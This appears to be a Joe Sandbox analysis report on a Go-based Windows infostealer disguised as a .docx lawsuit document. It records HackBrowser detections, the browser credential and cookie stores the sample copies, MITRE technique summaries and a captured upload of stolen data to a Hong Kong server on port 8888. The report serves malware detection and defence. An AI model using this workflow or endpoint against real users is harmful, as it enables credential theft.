https://docs.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://ac.ecosia.org/autocomplete?q=	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	URL Reputation: safe	unknown
https://drive-staging.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturee	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C000082000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C0000C8000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://drive-daily-6.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://drive.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://drive-daily-0.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	places.sqlite_17.temp.0.dr	false	URL Reputation: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C000158000.00000004.00001000.00020000.00000000.sdmp, #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C00015E000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://drive-preprod.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md04	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C0000C8000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://support.mozilla.org	places.sqlite_17.temp.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://github.com/moonD4rk/HackBrowserDataCompactions	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	false	0%, Virustotal, Browse	unknown
https://drive-daily-3.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.248.8.109	unknown	Hong Kong		134705	ITACE-AS-APItaceInternationalLimitedHK	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533050
Start date and time:	2024-10-14 11:07:34 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe renamed because original name is a hash value
Original Sample Name:	.docx.exe
Detection:	MAL
Classification:	mal80.troj.spyw.evad.winEXE@1/25@0/1
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ITACE-AS-APItaceInternationalLimitedHK	m0mg1WH7Su.elf	Get hash	malicious	Mirai	Browse	156.237.86.202
	cIhVfU4Bus.elf	Get hash	malicious	Mirai	Browse	156.235.45.186
	na.elf	Get hash	malicious	Unknown	Browse	154.223.21.228
	na.elf	Get hash	malicious	Unknown	Browse	154.223.21.228
	na.elf	Get hash	malicious	Unknown	Browse	154.223.21.228
	na.elf	Get hash	malicious	Unknown	Browse	154.214.230.229
	NCVLNSfw1e.elf	Get hash	malicious	Unknown	Browse	154.223.21.228
	ZB2ShQdNBY.elf	Get hash	malicious	Mirai	Browse	156.227.127.139
	4LbWi40g57.elf	Get hash	malicious	Unknown	Browse	154.223.21.228
	nullnet_load.arm.elf	Get hash	malicious	Mirai	Browse	156.237.86.224

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Process:	C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.27787287631001
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe
File size:	12'996'608 bytes
MD5:	daf21b9d206ce16fc3bd087abd0c6389
SHA1:	76c67b3413830e45b0a5d938fb7976d47da10579
SHA256:	a62c290374a53ae0e30ba18422ead75f2a271a4b58cd6204940112364246d7ac
SHA512:	98974531f53ca2c1f2b024735ac395b9671f9a670b5084da66d58d8524a094a5ffcb97fdd5e280ee52bd24f949d517d178094c3569158985942bed4a0879bc4a
SSDEEP:	98304:wlIQmZHaATNOA5J3nTER/faI7hqRnQhSu+/U8E2+TaKVHsUTzHmh9YWHyDx:wlAZ6ANOA5J3gaQEO2+TH3/HmDZMx
TLSH:	DED63C87E8A542E5C0AED135C9B6D653BA713C888B30A3D73B50F7242F76BD05AB9710
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."......._...................@.....................................bJ....`... ............................

Entrypoint:	0x471ca0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	c2d457ad8ac36fc9f18d45bffcd450c2

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcbe000	0x554	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcd7000	0x253f3	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xc98000	0x24ec4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xcbf000	0x16c6e	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xba18a0	0x180	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5fc400	0x5fc400	2b6aa5011ca414ce1890e50b8abf6802	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x5fe000	0x5a2fa8	0x5a3000	f89d44246e9502d077229ab28977baa7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba1000	0xf6d00	0x63a00	477563216ed004958003684c4b0ac2d9	False	0.40149584378920955	data	4.876891055461003	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xc98000	0x24ec4	0x25000	9cf13ae8724807a7be7f533511110ef6	False	0.40140017947635137	data	5.651935034914385	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0xcbd000	0xb4	0x200	4ddb39a0b3a3ef68553c769cd94d62b8	False	0.22265625	data	1.783206012798912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0xcbe000	0x554	0x600	5e108bfed92a7a6163959e51b518d321	False	0.3828125	data	4.056727956955747	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xcbf000	0x16c6e	0x16e00	515c6bb7146f362e90a3c2a4bbda1307	False	0.19506702527322403	data	5.452301614018878	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xcd6000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcd7000	0x253f3	0x25400	d4f4e23f0036ec34973b66a24d479d82	False	0.13933384018456377	data	4.135119374651998	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcd7244	0x25bb	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9445077130137696
RT_ICON	0xcd9800	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584			0.06425233644859812
RT_ICON	0xcea028	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016			0.0778326676476771
RT_ICON	0xcf34d0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896			0.07274444969296173
RT_ICON	0xcf76f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.08153526970954357
RT_ICON	0xcf9ca0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.1327392120075047
RT_ICON	0xcfad48	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.19262295081967212
RT_ICON	0xcfb6d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.26063829787234044
RT_GROUP_ICON	0xcfbb38	0x76	data			0.711864406779661
RT_MANIFEST	0xcfbbb0	0x843	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (2055), with CRLF line terminators	English	United States	0.31631205673758866

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 11:08:31.465478897 CEST	49704	8888	192.168.2.5	43.248.8.109
Oct 14, 2024 11:08:31.470529079 CEST	8888	49704	43.248.8.109	192.168.2.5
Oct 14, 2024 11:08:31.470748901 CEST	49704	8888	192.168.2.5	43.248.8.109
Oct 14, 2024 11:08:31.471028090 CEST	49704	8888	192.168.2.5	43.248.8.109
Oct 14, 2024 11:08:31.475872993 CEST	8888	49704	43.248.8.109	192.168.2.5
Oct 14, 2024 11:08:32.601125956 CEST	8888	49704	43.248.8.109	192.168.2.5
Oct 14, 2024 11:08:32.601177931 CEST	8888	49704	43.248.8.109	192.168.2.5
Oct 14, 2024 11:08:32.601255894 CEST	49704	8888	192.168.2.5	43.248.8.109
Oct 14, 2024 11:08:32.601392984 CEST	49704	8888	192.168.2.5	43.248.8.109
Oct 14, 2024 11:08:32.606575966 CEST	8888	49704	43.248.8.109	192.168.2.5
Oct 14, 2024 11:08:32.606641054 CEST	49704	8888	192.168.2.5	43.248.8.109

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:08:31.471028090 CEST	1140	OUT	POST /upload HTTP/1.1 Host: 43.248.8.109:8888 User-Agent: Go-http-client/1.1 Content-Length: 908 Content-Type: multipart/form-data; boundary=20d5805c7f211953f7ac5355ef88de92a98d5cde4287aa1efa9f46f5ca46 Accept-Encoding: gzip Data Raw: 2d 2d 32 30 64 35 38 30 35 63 37 66 32 31 31 39 35 33 66 37 61 63 35 33 35 35 65 66 38 38 64 65 39 32 61 39 38 64 35 63 64 65 34 32 38 37 61 61 31 65 66 61 39 66 34 36 66 35 63 61 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 65 6e 63 72 79 70 74 65 64 2d 34 31 39 36 30 39 33 38 32 30 2e 64 61 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a4 1d 4b 2c e7 6a 36 63 91 af fc 60 a9 de 62 97 8c 65 20 42 43 02 22 a4 90 66 5f f9 f0 59 9f 75 03 c4 98 fb b6 f7 53 45 5e 96 68 1c 31 ed 5d 14 d2 6d ac a8 69 10 be 91 05 34 98 d5 8e 5b e0 ae ca 26 11 24 ab 58 4a 72 28 44 cb 3b 8e e1 79 c2 26 69 b1 ce 69 bc 37 87 a5 e3 7f 2c e7 56 f5 65 41 c0 07 ad 95 38 15 15 11 b4 a0 8d 9a 9a 36 58 af af d6 fd b5 47 93 45 69 ba bd 41 44 e2 c2 0c 02 0f 8f 81 8c 47 ce 77 5d 10 b5 44 69 e3 9a 86 26 0a 30 ab 82 1e [TRUNCATED] Data Ascii: --20d5805c7f211953f7ac5355ef88de92a98d5cde4287aa1efa9f46f5ca46Content-Disposition: form-data; name="file"; filename="encrypted-4196093820.dat"Content-Type: application/octet-streamK,j6c`be BC"f_YuSE^h1]mi4[&$XJr(D;y&ii7,VeA86XGEiADGw]Di&0< Z[^m5P\|\"1y=)k[mCcBcLPVRERN;^MalNi[etZyo"<rmqDSKN\hQIW/w\|3I1A:AYeJwSnLP<4{eWB>^5z_0l#-ngv@fghwj>>l&~{.S`"7EPNB/]/nGl?=LoPA=L}`$aIB1c`3!/Fn#ZPhf'm[gZlD\|D>v02Xjp'Z6E!#I--20d5805c7f211953f7ac5355ef88de92a98d5cde4287aa1efa9f46f5ca46--
Oct 14, 2024 11:08:32.601125956 CEST	195	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Date: Mon, 14 Oct 2024 09:08:21 GMT Content-Length: 78 Data Raw: 46 69 6c 65 20 77 61 73 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 61 76 65 64 20 74 6f 20 2e 2f 72 65 73 75 6c 74 2f 61 63 63 38 2e 34 36 2e 31 32 33 2e 33 33 5f 31 37 32 38 38 39 36 39 30 31 34 36 36 32 37 36 35 30 30 2e 7a 69 70 Data Ascii: File was successfully saved to ./result/acc8.46.123.33_1728896901466276500.zip
Oct 14, 2024 11:08:32.601177931 CEST	195	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Date: Mon, 14 Oct 2024 09:08:21 GMT Content-Length: 78 Data Raw: 46 69 6c 65 20 77 61 73 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 61 76 65 64 20 74 6f 20 2e 2f 72 65 73 75 6c 74 2f 61 63 63 38 2e 34 36 2e 31 32 33 2e 33 33 5f 31 37 32 38 38 39 36 39 30 31 34 36 36 32 37 36 35 30 30 2e 7a 69 70 Data Ascii: File was successfully saved to ./result/acc8.46.123.33_1728896901466276500.zip

Target ID:	0
Start time:	05:08:28
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe"
Imagebase:	0xfe0000
File size:	12'996'608 bytes
MD5 hash:	DAF21B9D206CE16FC3BD087ABD0C6389
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_HackBrowser, Description: Yara detected HackBrowser, Source: 00000000.00000000.2083812372.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_HackBrowser, Description: Yara detected HackBrowser, Source: 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Cookies_2.temp

C:\Users\user\AppData\Local\Temp\History_4.temp

C:\Users\user\AppData\Local\Temp\History_5.temp

C:\Users\user\AppData\Local\Temp\Local State_0.temp

C:\Users\user\AppData\Local\Temp\Local Storage\leveldb_7.temp\CURRENT

C:\Users\user\AppData\Local\Temp\Local Storage\leveldb_7.temp\LOG

C:\Users\user\AppData\Local\Temp\Local Storage\leveldb_7.temp\LOG.old

C:\Users\user\AppData\Local\Temp\Local Storage\leveldb_7.temp\MANIFEST-000001

C:\Users\user\AppData\Local\Temp\Login Data_1.temp

C:\Users\user\AppData\Local\Temp\Secure Preferences_9.temp

C:\Users\user\AppData\Local\Temp\Session Storage_8.temp\000003.log

C:\Users\user\AppData\Local\Temp\Session Storage_8.temp\CURRENT

C:\Users\user\AppData\Local\Temp\Session Storage_8.temp\LOG

C:\Users\user\AppData\Local\Temp\Session Storage_8.temp\MANIFEST-000001

C:\Users\user\AppData\Local\Temp\Web Data_6.temp

C:\Users\user\AppData\Local\Temp\cookies.sqlite_14.temp

C:\Users\user\AppData\Local\Temp\encrypted-4196093820.dat

C:\Users\user\AppData\Local\Temp\extensions.json_21.temp

C:\Users\user\AppData\Local\Temp\key4.db_12.temp

C:\Users\user\AppData\Local\Temp\places.sqlite_15.temp

Windows Analysis Report
#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe